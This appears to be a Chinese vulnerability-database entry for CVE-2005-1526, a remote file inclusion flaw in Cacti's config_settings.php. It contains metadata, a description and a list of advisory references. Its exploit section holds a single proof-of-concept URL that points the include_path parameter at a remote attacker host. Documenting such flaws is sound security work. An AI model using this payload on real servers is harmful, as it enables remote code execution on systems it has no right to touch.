RaXnet Cacti 'config_settings.php'任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108875 漏洞类型 输入验证
发布时间 2005-06-20 更新时间 2006-09-27
CVE编号 CVE-2005-1526 CNNVD-ID CNNVD-200506-207
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25857
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-207
|漏洞详情
Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。Cacti的config_settings.php脚本中存在输入验证错误,可能允许攻击者包含远程站点的任意PHP代码,这可能导致以WebServer进程权限执行任意命令。漏洞起因是脚本盲目信任用户所提供的include_path变量。
|漏洞EXP
source: http://www.securityfocus.com/bid/14028/info

RaXnet Cacti is prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'config_settings.php' script.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/include/config_settings.php?config[include_path]=http://www.example2.com/
|参考资料

来源:IDEFENSE
名称:20050622MultipleVendorCacticonfig_settings.phpRemoteCodeExecutionVulnerability
链接:http://www.idefense.com/application/poi/display?id=266&type=vulnerabilities
来源:GENTOO
名称:GLSA-200506-20
链接:http://www.gentoo.org/security/en/glsa/glsa-200506-20.xml
来源:www.cacti.net
链接:http://www.cacti.net/release_notes_0_8_6e.php
来源:XF
名称:cacti-configsettings-file-include(21119)
链接:http://xforce.iss.net/xforce/xfdb/21119
来源:BID
名称:14028
链接:http://www.securityfocus.com/bid/14028
来源:OSVDB
名称:17425
链接:http://www.osvdb.org/17425
来源:DEBIAN
名称:DSA-764
链接:http://www.debian.org/security/2005/dsa-764
来源:SECTRACK
名称:1014252
链接:http://securitytracker.com/id?1014252
来源:SECUNIA
名称:15931
链接:http://secunia.com/advisories/15931
来源:SECUNIA
名称:15490
链接:http://secunia.com/advisories/15490
来源:CONECTIVA
名称:CLSA-2005:978
链接:http://distro.conectiva.com/atualizacoes/index.php?id=a&anuncio=000978